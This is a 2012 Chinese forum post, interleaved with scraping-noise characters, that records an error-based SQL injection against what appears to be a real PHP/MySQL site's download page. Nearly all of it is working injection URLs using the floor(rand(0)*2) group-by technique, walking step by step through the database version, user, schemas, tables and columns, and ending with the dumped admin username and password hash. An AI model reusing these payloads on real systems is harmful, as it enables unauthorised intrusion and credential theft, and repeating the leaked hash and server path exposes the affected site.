找回密码
 立即注册
查看: 2437|回复: 0
打印 上一主题 下一主题

php+mysql高级爆错注入经测算有效

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:52:09 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://www.wooyun.org/bugs/wooyun-2010-016663 C, b3 C6 T0 ~1 L0 I: {
5 c" [0 m3 x2 z
之前想找个测试 没想到这有 可以测试下做个记录而已 7 ?0 ?; ^6 L# k# ~$ J6 B1 P
9 `" u8 O3 e; }6 U0 g
http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003; k2 p/ n/ }) {6 K4 T" B
, e( r  Z/ g' B1 l; h
/data0/htdocs/leqi_new/app/myapp.php
# M+ V% x; @! D
& `. D; `! C# g. E( M0 b 或者9 k% l* ]6 o6 j8 b! n5 Q
( c7 g3 v2 N5 M
/**********version()**********/ 5.1.49-log- u6 I, S0 B/ a
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
; R$ U6 {, Z; G, P
* v, |1 a$ [4 U2 e1 A0 D6 F% j/**********user()**********/  0 F: z: h# M7 i! k! V+ E  A
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003: `, j8 Q/ d2 g( ~$ u' h2 f$ Y' K
4 R# x3 L; J/ M: {7 {6 Q7 Y
/**********database()**********/  leqi" I$ g7 F0 ^+ ]5 ]. O: @+ h9 M
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
0 v' \! k# e% f6 M) e
6 q3 ]8 L: n" W  i6 s5 V! t, Z/**********limit依次递归爆库**********/
6 f9 c" a; z# P' Phttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003" }7 J: H: |, H3 D& x8 J* R* P/ E* w0 ^
information_schema1 s9 c- x3 i6 `2 b
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003' y5 K- e, x7 }+ s& n6 [4 l, `
leqi
. H! Y' j0 Y% q+ A. _( `  v5 [http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
3 X9 v1 J, g- p1 g: S0 h5 v& o. ftest1 }- @5 B# O5 ^" w) x

2 c3 v; @, m" J" t/**********limit依次递归爆表名**********/
4 d, \9 `3 p: _! Uhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003! k* g  d5 q9 _) m0 q4 G
users
- M) G& J+ ]7 y2 C8 r; N$ ], g, g/ L' e) M
/**********limit依次递归爆字段名**********// o& G: l: i1 J/ t( ?3 M! |1 j
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
4 O! ^1 V* A, c9 q: Xuser_id,username,nickname,passwd,group_id, j2 R4 H; x# y
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
) \# O6 R+ F0 g$ r8 U/wapc/5000_0005_003" M  F( Z, r1 z, J3 n8 }
11 21- K# w) w. C7 Y% p; Y- _
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
& l9 Z5 W! A1 M/wapc/5000_0005_003
" J% [* }' b* X& ~4 v  Z11 341 351 3610 z/ G2 o3 S8 E) p) d
/**********爆数据**********/
. M) w+ \1 P0 Z( s! Q- ^http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23' r& h' t8 \  b  \
admin. c/ k0 @& ?  f& R
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23% {, G& r& ]/ b' Q$ |, Y
6a8b4574ca231eb8bd52764d4978ffcd
* I0 X8 `" B& m, e* ~& D5 n- {+ W. A7 x% H6 a' N3 f: b3 O# V
  Y8 J; ^3 n2 f# A( H0 A: n
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表